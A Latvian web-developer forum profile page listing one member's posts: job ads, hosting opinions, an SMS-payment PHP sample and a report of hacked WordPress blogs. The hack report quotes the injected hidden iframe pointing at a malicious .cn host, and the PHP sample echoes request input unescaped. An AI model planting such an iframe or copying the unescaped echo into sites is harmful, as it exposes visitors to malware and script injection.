Jump to content
php.lv forumi

TadeUSH

Reģistrētie lietotāji
  • Posts

    37
  • Joined

  • Last visited

TadeUSH's Achievements

Newbie

Newbie (1/14)

  1. Paldies par iesūtītajiem CV, vakance vairs nav brīva.
  2. Paldies par iesūtītajiem CV, vakance vairs nav brīva.
  3. Tiek meklēts BackEnd (PHP/CodeIgniter/Laravel) developers. Darbs attālināti, var arī kā freelance. Interesentiem: [email protected] 27736776 (no SMS)
  4. Tiek meklēts FrontEnd (HTML/CSS/JS) developers. Darbs attālināti, var arī kā freelance. Interesentiem: [email protected] 27736776 (no SMS)
  5. Labdien! Pirms 2 dienām, 2 wordpress blogiem, kas atradās zem viena domēna notika uzbrukums. index.php un wp-includes/defult-filters.php tika pievienots <iframe src="http://lotbetsite.cn:8080/index.php" width=137 height=148 style="visibility: hidden"></iframe> Tikai tagad nedomā visi līst iekšā tajā saitā, it sevišķi kam ir neaizsargāti Windowi Googles tantē izmeklējos par šādu problēmu un atradu ka neesmu vienīgais, tikai veiksmīgu risinājumu pret uzbrukumu nesaņēmu. Tikai vesela virkne par to ka vajag pārbaudīt PC un ka uzbrukums notiek tieši caur FTP, bet tas nu gan nav iespējams, jo lietoju vienotu FTP ACC un dažādus CMS, bet problēmas ir tieši ar WordPress. Varbūt ir kādam kādi risinājumi piedāvājami?
  6. Labdien. Piesaistiju Domēnu gmail serverim, lai tas kalpo kā Mail serveris. Viss notiek . tik kad jānosūta meils caur Web (SMTP) tas sūtīšana nenotiek. Sūta tikai lokālajiem pastiem (konkrētās adreses pastiem kas piesaistīti googles pastam), kā arī tikai Gmail serverī ... Vai problēma ir gmail serverī , un ko man ietiektu kāds darīt :?
  7. Vajadzīga mājas lapa ar 4 sadaļām (Jaunumi,Pakalpojumi,Par mums,Kontakti) + admin panelis Kas atiecās uz dizainu ļoti vienkārš un ir paradzēts sampls kurš ir krāsu ziņā jāizmaina Sīkāka info un pieteikumu ar cenu (PM)
  8. TadeUSH

    tunt

    Tunt izskatās labāk nekā tanks.lv Nebūtu tik pārliecināts ... Nekādā gadijumā neņemt no.lv
  9. Kas te ir nesaprotams: http://fortumo.lv/main/about_premium SMS scripts kas arī atbild uz sms <?php // check that the request comes from Fortumo server if(!in_array($_SERVER['REMOTE_ADDR'], array('81.20.151.38', '81.20.148.122'))) { die("Error: Unknown IP"); } // check the signature $secret = ''; // insert your secret between '' if(!empty($secret) && !check_signature($_GET, $secret)) { die("Error: Invalid signature"); } $sender = $_GET['sender']; $message = $_GET['message']; // do something with $sender and $message $reply = "Thank you $sender for sending $message"; // print out the reply echo($reply); function check_signature($params_array, $secret) { ksort($params_array); $str = ''; foreach ($params_array as $k=>$v) { if($k != 'sig') { $str .= "$k=$v"; } } $str .= $secret; $signature = md5($str); return ($params_array['sig'] == $signature); } ?>
  10. TadeUSH

    Poga aiz fona

    uzmauc pa virsu caurspīdīgu gif ar linku
  11. no.lv ? tas laikam ir joks ... no.lv klientu kodi bij pieejami dc++ pirms kāda laika , par to visi runāja... no.lv ir lielākā krāpšana latvijas hostingos es pieļauju ... tur to visu vada 1 čalis kurš izvietojis savu PC izzi datu centrā un uzmaicis visu iespējamo klāsti uz sava PC , viņš mēdz nojukt un atbildes vietā jums var nākties gaidīt pāris dienas ... bij aizkavējies rēķins tika nevis slēgta pieeja bet izdzēsta datubāze, + par backup taisīšanu jāmaksā bij 5 vai 10 Ls Pasūtot pie viņiem domēnu īstais īpašnieks būs no.lv un atgūt to jūs varēsiet 70Ls soda nauda
  12. TadeUSH

    Web sistema.

    Izklausās ka autoram ir daudz prasības, bet ka starta kapitāls porjektam laikam ka nav tik liels
  13. Paskaties līguma dokumentos, tur noteikti ir rakstīta summa kurai tu pats piekriti.
  14. Tu meklē ne tikai entuziastu ,bet arī idiotu ... :)
  15. TadeUSH

    Ko lai izmanto?

    Personīgajā pieredzē izmantoju 2 e107 un php-fusion php-fusion vienozīmīgi bij labāks un bij vieglāk izlabot kļūdas un papildināt jau esošo ...
×
×
  • Create New...